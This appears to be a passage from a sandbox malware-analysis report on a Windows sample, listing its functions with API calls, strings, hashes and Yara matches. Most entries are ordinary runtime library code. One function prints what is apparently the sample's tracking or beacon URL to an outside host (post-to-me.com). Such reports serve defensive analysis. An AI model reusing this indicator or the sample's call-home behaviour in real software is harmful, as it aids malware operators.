Opcode Fuzzy Hash: ddd470ca706d5bdb1fd34f34a64e878e0bf6dea1610dba1cf15e232951c7dc30
Instruction Fuzzy Hash: B7F0F671A0421467CA15B737A8529EEB7669F90764B40012FF41193292DFAC9E9886CD

Function 02107B77 Relevance: 7.5, APIs: 5, Instructions: 41COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 02102994: TlsGetValue.KERNEL32(?,?,02100DB2,02102EBF,00000000,?,02100D90,?,?,?,00000000,?,00000000), ref: 0210299A

Concurrency::details::InternalContextBase::LeaveScheduler.LIBCONCRT ref: 02107BA1

Part of subcall function 0211120A: Concurrency::details::InternalContextBase::FindWorkForBlockingOrNesting.LIBCONCRT ref: 02111231
Part of subcall function 0211120A: Concurrency::details::InternalContextBase::PrepareForUse.LIBCONCRT ref: 0211124A
Part of subcall function 0211120A: Concurrency::details::VirtualProcessor::MakeAvailable.LIBCONCRT ref: 021112C0
Part of subcall function 0211120A: Concurrency::details::SchedulerBase::DeferredGetInternalContext.LIBCONCRT ref: 021112C8

Concurrency::details::SchedulerBase::ReferenceForAttach.LIBCONCRT ref: 02107BAF
Concurrency::details::SchedulerBase::GetExternalContext.LIBCMT ref: 02107BB9
Concurrency::details::ContextBase::PushContextToTls.LIBCMT ref: 02107BC3
__CxxThrowException@8.LIBVCRUNTIME ref: 02107BE1

Memory Dump Source

Source File: 00000000.00000002.3754714208.00000000020F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_20f0000_b0cQukXPAl.jbxd

Yara matches

Similarity

API ID: Concurrency::details::$Base::Context$InternalScheduler$AttachAvailableBlockingDeferredException@8ExternalFindLeaveMakeNestingPrepareProcessor::PushReferenceThrowValueVirtualWork
String ID:
API String ID: 4266703842-0
Opcode ID: ddd470ca706d5bdb1fd34f34a64e878e0bf6dea1610dba1cf15e232951c7dc30
Instruction ID: ec16f4d3628c1de830aeb6925b19cb7842b249a017118a8665e9006c3f1fa1b3
Opcode Fuzzy Hash: ddd470ca706d5bdb1fd34f34a64e878e0bf6dea1610dba1cf15e232951c7dc30
Instruction Fuzzy Hash: 62F02B31A402187FCF25B77598D096EF7279F80B14B04416AD811532D0EFB5AE068FC1

Function 00439E35 Relevance: 7.5, APIs: 5, Instructions: 40COMMONLIBRARYCODE

Download Yara Rule

APIs

_free.LIBCMT ref: 00439E4D

Part of subcall function 0043345A: HeapFree.KERNEL32(00000000,00000000,?,0043A0E8,?,00000000,?,00000000,?,0043A38C,?,00000007,?,?,0043A780,?), ref: 00433470
Part of subcall function 0043345A: GetLastError.KERNEL32(?,?,0043A0E8,?,00000000,?,00000000,?,0043A38C,?,00000007,?,?,0043A780,?,?), ref: 00433482

_free.LIBCMT ref: 00439E5F
_free.LIBCMT ref: 00439E71
_free.LIBCMT ref: 00439E83
_free.LIBCMT ref: 00439E95

Memory Dump Source

Source File: 00000000.00000002.3753884768.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_b0cQukXPAl.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 840ca0e3b6ef7411d9bccf2beb0d2f3308f2e3b12e8065f1d82b45f6a0a0fab8
Instruction ID: d2eb3a6f69ed6479eb379d103aeec45d7d0be428363b37fe18b93f123c88dda9
Opcode Fuzzy Hash: 840ca0e3b6ef7411d9bccf2beb0d2f3308f2e3b12e8065f1d82b45f6a0a0fab8
Instruction Fuzzy Hash: E2F04F32905300A7A621EF59E487C1773D9BB08712F68694BF00CD7751CB79FC808A5D

Function 0212A09C Relevance: 7.5, APIs: 5, Instructions: 40COMMONLIBRARYCODE

Download Yara Rule

APIs

_free.LIBCMT ref: 0212A0B4

Part of subcall function 021236C1: HeapFree.KERNEL32(00000000,00000000,?,0212A34F,?,00000000,?,00000000,?,0212A5F3,?,00000007,?,?,0212A9E7,?), ref: 021236D7
Part of subcall function 021236C1: GetLastError.KERNEL32(?,?,0212A34F,?,00000000,?,00000000,?,0212A5F3,?,00000007,?,?,0212A9E7,?,?), ref: 021236E9

_free.LIBCMT ref: 0212A0C6
_free.LIBCMT ref: 0212A0D8
_free.LIBCMT ref: 0212A0EA
_free.LIBCMT ref: 0212A0FC

Memory Dump Source

Source File: 00000000.00000002.3754714208.00000000020F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_20f0000_b0cQukXPAl.jbxd

Yara matches

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 840ca0e3b6ef7411d9bccf2beb0d2f3308f2e3b12e8065f1d82b45f6a0a0fab8
Instruction ID: 110eb545cc8c64cd8518a53aeab83e225022d9a4b30ea60246d4738fa7bfb56e
Opcode Fuzzy Hash: 840ca0e3b6ef7411d9bccf2beb0d2f3308f2e3b12e8065f1d82b45f6a0a0fab8
Instruction Fuzzy Hash: 2AF04F32985220AB8624EB54F8C6C1A77DEAF043147640D85F418D7721CB35F8B58B9D

Function 0043171A Relevance: 7.5, APIs: 5, Instructions: 30COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 00431738

Part of subcall function 0043345A: HeapFree.KERNEL32(00000000,00000000,?,0043A0E8,?,00000000,?,00000000,?,0043A38C,?,00000007,?,?,0043A780,?), ref: 00433470
Part of subcall function 0043345A: GetLastError.KERNEL32(?,?,0043A0E8,?,00000000,?,00000000,?,0043A38C,?,00000007,?,?,0043A780,?,?), ref: 00433482

_free.LIBCMT ref: 0043174A
_free.LIBCMT ref: 0043175D
_free.LIBCMT ref: 0043176E
_free.LIBCMT ref: 0043177F

Memory Dump Source

Source File: 00000000.00000002.3753884768.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_b0cQukXPAl.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: b228b96d46590c86949e27b4ef7eacf2620a314154de2a574f90fb6d598625a0
Instruction ID: 641b2a1348aedb00c037ff60dfb94c9ddf1ba1fe668fd8dfad71f65212485368
Opcode Fuzzy Hash: b228b96d46590c86949e27b4ef7eacf2620a314154de2a574f90fb6d598625a0
Instruction Fuzzy Hash: D8F03070C003109BAA236F15AC414053B60BF2D727B15626BF40697273CB38D952DF8E

Function 0041CCB5 Relevance: 7.5, APIs: 5, Instructions: 30threadCOMMON

Download Yara Rule

APIs

Concurrency::details::ResourceManager::CurrentSubscriptionLevel.LIBCONCRT ref: 0041CCBF
Concurrency::details::SchedulerProxy::DecrementFixedCoreCount.LIBCONCRT ref: 0041CCF0
GetCurrentThread.KERNEL32 ref: 0041CCF9
Concurrency::details::SchedulerProxy::DecrementCoreSubscription.LIBCONCRT ref: 0041CD0C
Concurrency::details::SchedulerProxy::DestroyExecutionResource.LIBCONCRT ref: 0041CD15

Memory Dump Source

Source File: 00000000.00000002.3753884768.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_b0cQukXPAl.jbxd

Similarity

API ID: Concurrency::details::$Proxy::Scheduler$CoreCurrentDecrementResourceSubscription$CountDestroyExecutionFixedLevelManager::Thread
String ID:
API String ID: 2583373041-0
Opcode ID: 996dff0fc395249e0236d91b5da2feb8ab8ec11bd453b3fcc2396c02b39d80d4
Instruction ID: c05db364d3e23aa36edd3e4f9db1c19a47e3778ae9c6089a54b2af47d917b565
Opcode Fuzzy Hash: 996dff0fc395249e0236d91b5da2feb8ab8ec11bd453b3fcc2396c02b39d80d4
Instruction Fuzzy Hash: 0EF0A776240500AB8625FF22F9518F77776EFC4715310091EE44B07651DF29ADC2DB6A

Function 02121981 Relevance: 7.5, APIs: 5, Instructions: 30COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 0212199F

Part of subcall function 021236C1: HeapFree.KERNEL32(00000000,00000000,?,0212A34F,?,00000000,?,00000000,?,0212A5F3,?,00000007,?,?,0212A9E7,?), ref: 021236D7
Part of subcall function 021236C1: GetLastError.KERNEL32(?,?,0212A34F,?,00000000,?,00000000,?,0212A5F3,?,00000007,?,?,0212A9E7,?,?), ref: 021236E9

_free.LIBCMT ref: 021219B1
_free.LIBCMT ref: 021219C4
_free.LIBCMT ref: 021219D5
_free.LIBCMT ref: 021219E6

Memory Dump Source

Source File: 00000000.00000002.3754714208.00000000020F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_20f0000_b0cQukXPAl.jbxd

Yara matches

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: b228b96d46590c86949e27b4ef7eacf2620a314154de2a574f90fb6d598625a0
Instruction ID: 05161425c46de6a9c5511dbfb0b29ec83f0b7f1882eaf57df7a6f633ab79d37f
Opcode Fuzzy Hash: b228b96d46590c86949e27b4ef7eacf2620a314154de2a574f90fb6d598625a0
Instruction Fuzzy Hash: F8F0A971C40320AA9F21AF14BC844047B65AF1972271116A6F41696272C739997BDFDE

Function 0210CF1C Relevance: 7.5, APIs: 5, Instructions: 30threadCOMMON

Download Yara Rule

APIs

Concurrency::details::ResourceManager::CurrentSubscriptionLevel.LIBCONCRT ref: 0210CF26
Concurrency::details::SchedulerProxy::DecrementFixedCoreCount.LIBCONCRT ref: 0210CF57
GetCurrentThread.KERNEL32 ref: 0210CF60
Concurrency::details::SchedulerProxy::DecrementCoreSubscription.LIBCONCRT ref: 0210CF73
Concurrency::details::SchedulerProxy::DestroyExecutionResource.LIBCONCRT ref: 0210CF7C

Memory Dump Source

Source File: 00000000.00000002.3754714208.00000000020F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_20f0000_b0cQukXPAl.jbxd

Yara matches

Similarity

API ID: Concurrency::details::$Proxy::Scheduler$CoreCurrentDecrementResourceSubscription$CountDestroyExecutionFixedLevelManager::Thread
String ID:
API String ID: 2583373041-0
Opcode ID: 996dff0fc395249e0236d91b5da2feb8ab8ec11bd453b3fcc2396c02b39d80d4
Instruction ID: 1a812692d88cfb26e9ff24add10c2035d48a7a91869a50adfd855d5c5c3a5103
Opcode Fuzzy Hash: 996dff0fc395249e0236d91b5da2feb8ab8ec11bd453b3fcc2396c02b39d80d4
Instruction Fuzzy Hash: B7F012362805009FCA29EF61F9D09AB7776EFC4610310465DD596065D0CF61A947DF62

Function 020F2E61 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 179networkCOMMON

Download Yara Rule

APIs

InternetOpenW.WININET(00451E78,00000000,00000000,00000000,00000000), ref: 020F2E84

Part of subcall function 020F1321: _wcslen.LIBCMT ref: 020F1328
Part of subcall function 020F1321: _wcslen.LIBCMT ref: 020F1344

InternetOpenUrlW.WININET(00000000,?,00000000,00000000,00000000,00000000), ref: 020F3097

Strings

https://post-to-me.com/track_prt.php?sub=, xrefs: 020F2EB4, 020F2FE0, 020F304F
&cc=DE, xrefs: 020F3011, 020F3017, 020F3074

Memory Dump Source

Source File: 00000000.00000002.3754714208.00000000020F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_20f0000_b0cQukXPAl.jbxd

Yara matches

Similarity

API ID: InternetOpen_wcslen
String ID: &cc=DE$https://post-to-me.com/track_prt.php?sub=
API String ID: 3381584094-4083784958
Opcode ID: 8338334aa55b55d19b97b2d3d130d29e6172645a3c0eef54179fbcd96b31667d
Instruction ID: 132fe79beba6066d5f363e4ac89b0fdc927762de8c3a5c0d89a8e4a832284352
Opcode Fuzzy Hash: 8338334aa55b55d19b97b2d3d130d29e6172645a3c0eef54179fbcd96b31667d
Instruction Fuzzy Hash: 6D516395A65344A9E320EBB0BC55B3533B8FF58712F10543BE618CB2B2E7B1D944871E

Function 0043430B Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 147COMMON

Download Yara Rule

APIs

__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00434464
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00434479

Strings

BC, xrefs: 00434386
BC, xrefs: 00434473

Memory Dump Source

Source File: 00000000.00000002.3753884768.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_b0cQukXPAl.jbxd

Similarity

API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
String ID: BC$BC
API String ID: 885266447-2490606219
Opcode ID: e00c22cf9212fddccde6eda0d4f11a2eb8b15fda35716567c4cef15c7bcc9cff
Instruction ID: b88449fc46bca28f45784ded13f8a3cce66366d25dc88dae471b8c9c35daa9d8
Opcode Fuzzy Hash: e00c22cf9212fddccde6eda0d4f11a2eb8b15fda35716567c4cef15c7bcc9cff
Instruction Fuzzy Hash: 61518F71A00208AFCB14DF59C884AAEBBB2EFD8314F19C26AE81897361D775ED51CB44

Function 0042F708 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 115COMMON

Download Yara Rule

APIs

GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\b0cQukXPAl.exe,00000104), ref: 0042F743
_free.LIBCMT ref: 0042F80E
_free.LIBCMT ref: 0042F818

Strings

C:\Users\user\Desktop\b0cQukXPAl.exe, xrefs: 0042F73A, 0042F741, 0042F770, 0042F7A8

Memory Dump Source

Source File: 00000000.00000002.3753884768.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_b0cQukXPAl.jbxd

Similarity

API ID: _free$FileModuleName
String ID: C:\Users\user\Desktop\b0cQukXPAl.exe
API String ID: 2506810119-1752190588
Opcode ID: 3308642da0636a63a4a634081c543339ebae9412bef6dab2f9d0c3185595a996
Instruction ID: 9cabfb70e7d1101f7aa6931033736f2f7250cd8eb994997f94c6a7917a9720ec
Opcode Fuzzy Hash: 3308642da0636a63a4a634081c543339ebae9412bef6dab2f9d0c3185595a996
Instruction Fuzzy Hash: 7631B371B00228AFDB21DF9AAC8089FBBFCEF95314B90407BE80597211D7749E45CB99

Function 0211F96F Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 115COMMON

Download Yara Rule

APIs

GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\b0cQukXPAl.exe,00000104), ref: 0211F9AA
_free.LIBCMT ref: 0211FA75
_free.LIBCMT ref: 0211FA7F

Strings

C:\Users\user\Desktop\b0cQukXPAl.exe, xrefs: 0211F9A1, 0211F9A8, 0211F9D7, 0211FA0F

Memory Dump Source

Source File: 00000000.00000002.3754714208.00000000020F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_20f0000_b0cQukXPAl.jbxd

Yara matches

Similarity

API ID: _free$FileModuleName
String ID: C:\Users\user\Desktop\b0cQukXPAl.exe
API String ID: 2506810119-1752190588
Opcode ID: 344658832b7440f505bc5ce5f5f759f624a1cc75f0f479e4bcaf167d51fbcba4
Instruction ID: 43bed4064ec17ad239b2c4ba03b7f3f8f642828ec4381eb26d7f93a47d7cd396
Opcode Fuzzy Hash: 344658832b7440f505bc5ce5f5f759f624a1cc75f0f479e4bcaf167d51fbcba4
Instruction Fuzzy Hash: D631B071A84318EFDB21DF99EC84D9EBBFDEF89310B104076E80597261D7B49A42CB90

Function 020FC875 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 37COMMON

Download Yara Rule

APIs

__CxxThrowException@8.LIBVCRUNTIME ref: 020FC8D4

Strings

ios_base::failbit set, xrefs: 020FC8A1
ios_base::eofbit set, xrefs: 020FC8A6
ios_base::badbit set, xrefs: 020FC897, 020FC8B7

Memory Dump Source

Source File: 00000000.00000002.3754714208.00000000020F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_20f0000_b0cQukXPAl.jbxd

Yara matches

Similarity

API ID: Exception@8Throw
String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
API String ID: 2005118841-1866435925
Opcode ID: 019f52a8e0bb9ff9f48767ebbe9764e79a713ad81fd208e44c7c6c06e0bc9c3a
Instruction ID: d42e01546255f7007070e81e46c008ab0eb6249f14a10d6ac420b4c12255b241
Opcode Fuzzy Hash: 019f52a8e0bb9ff9f48767ebbe9764e79a713ad81fd208e44c7c6c06e0bc9c3a
Instruction Fuzzy Hash: 4EF0F67388470C6AEB84EA54CC43BEE33985B01705F048067DF426A882E7689906DBA4

Function 00428DBC Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 36threadCOMMONLIBRARYCODE

Download Yara Rule

APIs

IsProcessorFeaturePresent.KERNEL32(00000017,00431F4D), ref: 0042DF89
GetLastError.KERNEL32(00457910,00000010,00000003,00431F4D), ref: 0042DFC3
ExitThread.KERNEL32 ref: 0042DFCA

Strings

<(@, xrefs: 0042DFBC

Memory Dump Source

Source File: 00000000.00000002.3753884768.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_b0cQukXPAl.jbxd

Similarity

API ID: ErrorExitFeatureLastPresentProcessorThread
String ID: <(@
API String ID: 3213686812-4189137628
Opcode ID: 66e0b01c820f3c016cb479e2b3e6a53e6d0229a994ecfa947a89fafbf06fb01a
Instruction ID: c42ad4fc6a3a459dd0b6f73910b388841d309234efd3d08c580d18ad64b54486
Opcode Fuzzy Hash: 66e0b01c820f3c016cb479e2b3e6a53e6d0229a994ecfa947a89fafbf06fb01a
Instruction Fuzzy Hash: CCF02761B8432635FA2037B27D0BBAB19150F14B0DF96003FFF0A995C3DEAC955040AD

Function 0042FA0E Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 32COMMON

Download Yara Rule

APIs

Part of subcall function 004394FD: GetEnvironmentStringsW.KERNEL32 ref: 00439501

_free.LIBCMT ref: 0042FA4F
_free.LIBCMT ref: 0042FA56

Strings

8o_, xrefs: 0042FA41
8o_, xrefs: 0042FA0E, 0042FA3C

Memory Dump Source

Source File: 00000000.00000002.3753884768.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_b0cQukXPAl.jbxd

Similarity

API ID: _free$EnvironmentStrings
String ID: 8o_$8o_
API String ID: 3523873077-1503159954
Opcode ID: 74b13d0fcde66366100e3dca1cb45a37efbb8a6426e7ea2b6f327c2869fbdbbd
Instruction ID: 08707e55e404d2c76e2f6eae856c7126cd4318a61dcb705a42d68a92314f0541
Opcode Fuzzy Hash: 74b13d0fcde66366100e3dca1cb45a37efbb8a6426e7ea2b6f327c2869fbdbbd
Instruction Fuzzy Hash: 0EE0ED12F0592142E632B63B3C02A6A06144B8177EFD0423FE828D61C2DE6C880B029F

Function 0042DF6D Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 32threadCOMMONLIBRARYCODE

Download Yara Rule

APIs

IsProcessorFeaturePresent.KERNEL32(00000017,00431F4D), ref: 0042DF89
GetLastError.KERNEL32(00457910,00000010,00000003,00431F4D), ref: 0042DFC3
ExitThread.KERNEL32 ref: 0042DFCA

Strings

<(@, xrefs: 0042DFBC, 0040F1DD

Memory Dump Source

Source File: 00000000.00000002.3753884768.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_b0cQukXPAl.jbxd

Similarity

API ID: ErrorExitFeatureLastPresentProcessorThread
String ID: <(@
API String ID: 3213686812-4189137628
Opcode ID: 7b487a85bde145f5f6618f4d2cac6f1d463b179069c0564edcd31255594901e1
Instruction ID: 8d9534a8efac39963163d02413269ee71f33911fb9a211fcd458cde81c8fda17
Opcode Fuzzy Hash: 7b487a85bde145f5f6618f4d2cac6f1d463b179069c0564edcd31255594901e1
Instruction Fuzzy Hash: 08F0A061B8431635FA203BA1BD0BB9619254F14B09F56002BBE0AA95D2DAA9955041AD

Function 004242B7 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 31COMMON

Download Yara Rule

APIs

Concurrency::details::SchedulerProxy::DestroyVirtualProcessorRoot.LIBCONCRT ref: 004242E9
std::invalid_argument::invalid_argument.LIBCONCRT ref: 004242FB
__CxxThrowException@8.LIBVCRUNTIME ref: 00424309

Strings

pScheduler, xrefs: 004242F3

Memory Dump Source

Source File: 00000000.00000002.3753884768.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_b0cQukXPAl.jbxd

Similarity

API ID: Concurrency::details::DestroyException@8ProcessorProxy::RootSchedulerThrowVirtualstd::invalid_argument::invalid_argument
String ID: pScheduler
API String ID: 1381464787-923244539
Opcode ID: 27a4b28832b8d2c4d1e169b8d68e757cb4f39c4e60a74ca0ff363d542ca72071
Instruction ID: 0ab47ed57e3114165a5b8518f1ff4cdc14a790a58e52e99d458785ee7c9320ad
Opcode Fuzzy Hash: 27a4b28832b8d2c4d1e169b8d68e757cb4f39c4e60a74ca0ff363d542ca72071
Instruction Fuzzy Hash: E7F0A731B01224A7CB18FB56E852D9E73A99E40304791826FF806A3182DFBCA948C65D

Function 0041E60D Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 28threadCOMMON

Download Yara Rule

APIs

Concurrency::details::FreeThreadProxy::ReturnIdleProxy.LIBCONCRT ref: 0041E62F
std::invalid_argument::invalid_argument.LIBCONCRT ref: 0041E642
__CxxThrowException@8.LIBVCRUNTIME ref: 0041E650

Strings

pContext, xrefs: 0041E63A

Memory Dump Source

Source File: 00000000.00000002.3753884768.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_b0cQukXPAl.jbxd

Similarity

API ID: Concurrency::details::Exception@8FreeIdleProxyProxy::ReturnThreadThrowstd::invalid_argument::invalid_argument
String ID: pContext
API String ID: 1990795212-2046700901
Opcode ID: 94c991bbb4e237fce74e38a70429fd430151592173fe111bbf2d82945a6f33d3
Instruction ID: 74844cc6af7f8c94541e855de6513edd01ccc4ed259e70f51b8aa0ea99782ad2
Opcode Fuzzy Hash: 94c991bbb4e237fce74e38a70429fd430151592173fe111bbf2d82945a6f33d3
Instruction Fuzzy Hash: 9EE06139B0011427CB04FB65DC06C5DB7A8AEC0714390413BF905A3381DFB8AD0585CC

Function 00415D7A Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 21COMMON

Download Yara Rule

APIs

std::invalid_argument::invalid_argument.LIBCONCRT ref: 00415DAA
__CxxThrowException@8.LIBVCRUNTIME ref: 00415DB8

Strings

pScheduler, xrefs: 00415DA2
version, xrefs: 00415D8F

Memory Dump Source

Source File: 00000000.00000002.3753884768.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_b0cQukXPAl.jbxd

Similarity

API ID: Exception@8Throwstd::invalid_argument::invalid_argument
String ID: pScheduler$version
API String ID: 1687795959-3154422776
Opcode ID: 464dda17272c5f92190f115bd46177522cd506029ea0a62d1c7ec35c5c4aaa01
Instruction ID: 78896325b6b5d70010e1ee9e49f38da00e370817edf74f3b448257e365f7b275
Opcode Fuzzy Hash: 464dda17272c5f92190f115bd46177522cd506029ea0a62d1c7ec35c5c4aaa01
Instruction Fuzzy Hash: 99E08630900608F6CB14EE56D80EBDD77A45B51749F61C1277819610929BBC96C8CB4E

Function 00435888 Relevance: 6.3, APIs: 4, Instructions: 305COMMON

Download Yara Rule

APIs

_strrchr.LIBCMT ref: 00435913
__alldvrm.LIBCMT ref: 00435B14
__alldvrm.LIBCMT ref: 00435B36

Memory Dump Source

Source File: 00000000.00000002.3753884768.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_b0cQukXPAl.jbxd

Similarity

API ID: __alldvrm$_strrchr
String ID:
API String ID: 1036877536-0
Opcode ID: c132ce8b7a779d48d325dc1464a826f382782a4d305ff920fa0063c7638d007e
Instruction ID: bca4f3389f7aef3b321b47e138c454c1308b116cb1c02f017d73c82a305e3271
Opcode Fuzzy Hash: c132ce8b7a779d48d325dc1464a826f382782a4d305ff920fa0063c7638d007e
Instruction Fuzzy Hash: 65A14872A00B869FEB15DE18C8917AEFBE1EF19310F28426FD5859B381C23C9D41C759

Function 02125AEF Relevance: 6.3, APIs: 4, Instructions: 305COMMON

Download Yara Rule

APIs

_strrchr.LIBCMT ref: 02125B7A
__alldvrm.LIBCMT ref: 02125D7B
__alldvrm.LIBCMT ref: 02125D9D

Memory Dump Source

Source File: 00000000.00000002.3754714208.00000000020F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_20f0000_b0cQukXPAl.jbxd

Yara matches

Similarity

API ID: __alldvrm$_strrchr
String ID:
API String ID: 1036877536-0
Opcode ID: 64c4271fdf953b23329a06ffcbcc4f91b3e2631876221f6b3ba7206c8ff3dfb5
Instruction ID: 212d703e495e789b61a5c6f6372bf3806881384dd4d2829d2b658f4b909a8855
Opcode Fuzzy Hash: 64c4271fdf953b23329a06ffcbcc4f91b3e2631876221f6b3ba7206c8ff3dfb5
Instruction Fuzzy Hash: 68A177729803AABFD729CF18C8D07AEBBA7EF01310F54416DE5959B240D3358969CB50

Function 0043F9F8 Relevance: 6.2, APIs: 4, Instructions: 152COMMONLIBRARYCODE

Download Yara Rule

APIs

_free.LIBCMT ref: 0043FB27

Memory Dump Source

Source File: 00000000.00000002.3753884768.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_b0cQukXPAl.jbxd

Similarity

API ID: _free
String ID:
API String ID: 269201875-0
Opcode ID: 84a4b3704c3f7d6daab1b53251b5dd7fc6fa1148bfcc679931bd75404ad43a52
Instruction ID: f2494f1ef04ef44517cd1171a85dede66e5513e309315ffa42068036143921cc
Opcode Fuzzy Hash: 84a4b3704c3f7d6daab1b53251b5dd7fc6fa1148bfcc679931bd75404ad43a52
Instruction Fuzzy Hash: 57410771E00210ABDB257BBADC42AAF7664EF5E374F14127FF41882391D73C590946A9

Function 0212FC5F Relevance: 6.2, APIs: 4, Instructions: 152COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 0212FD8E

Memory Dump Source

Source File: 00000000.00000002.3754714208.00000000020F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_20f0000_b0cQukXPAl.jbxd

Yara matches

Similarity

API ID: _free
String ID:
API String ID: 269201875-0
Opcode ID: bd0f664e10209082f8b28efdae44aad90b5cc59672f94763d63ba3a93ec53303
Instruction ID: 3b6b0bb5f5036a95b72826077c823edb56b7e6e2cb268ceb4b26b45cfd94098b
Opcode Fuzzy Hash: bd0f664e10209082f8b28efdae44aad90b5cc59672f94763d63ba3a93ec53303
Instruction Fuzzy Hash: 23410B31AC01386FDB256FB89C44BAE3BB6EF45770F140625F828D7690D736447A8EA1

Function 02126AF4 Relevance: 6.1, APIs: 4, Instructions: 110COMMONLIBRARYCODE

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(00000004,00000000,0000007F,004497A0,00000000,00000000,8B56FF8B,0212046A,?,00000004,00000001,004497A0,0000007F,?,8B56FF8B,00000001), ref: 02126B41
MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 02126BCA
GetStringTypeW.KERNEL32(?,00000000,00000000,?), ref: 02126BDC
__freea.LIBCMT ref: 02126BE5

Part of subcall function 021238FE: RtlAllocateHeap.NTDLL(00000000,020FDACD,00000000), ref: 02123930

Memory Dump Source

Source File: 00000000.00000002.3754714208.00000000020F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_20f0000_b0cQukXPAl.jbxd

Yara matches

Similarity

API ID: ByteCharMultiWide$AllocateHeapStringType__freea
String ID:
API String ID: 2652629310-0
Opcode ID: 6691954612650c490b0f1db7a760fe6ab7f85cafeb43cd7dd41aaf3ed81f1cf0
Instruction ID: 86de2d726bdb959bdc32650c1d5f528e718473658a53ab35498eb2da3e296761
Opcode Fuzzy Hash: 6691954612650c490b0f1db7a760fe6ab7f85cafeb43cd7dd41aaf3ed81f1cf0
Instruction Fuzzy Hash: 4A31EF72A4026AAFDF258F64CC84EAE7BA9EF04714F040268FC04D7190EB35DD64CB90

Function 0040D3E1 Relevance: 6.1, APIs: 4, Instructions: 80COMMONLIBRARYCODE

Download Yara Rule

APIs

_xtime_get.LIBCPMT ref: 0040D439
__Xtime_diff_to_millis2.LIBCPMT ref: 0040D453
_xtime_get.LIBCPMT ref: 0040D476
__Xtime_diff_to_millis2.LIBCPMT ref: 0040D482

Memory Dump Source

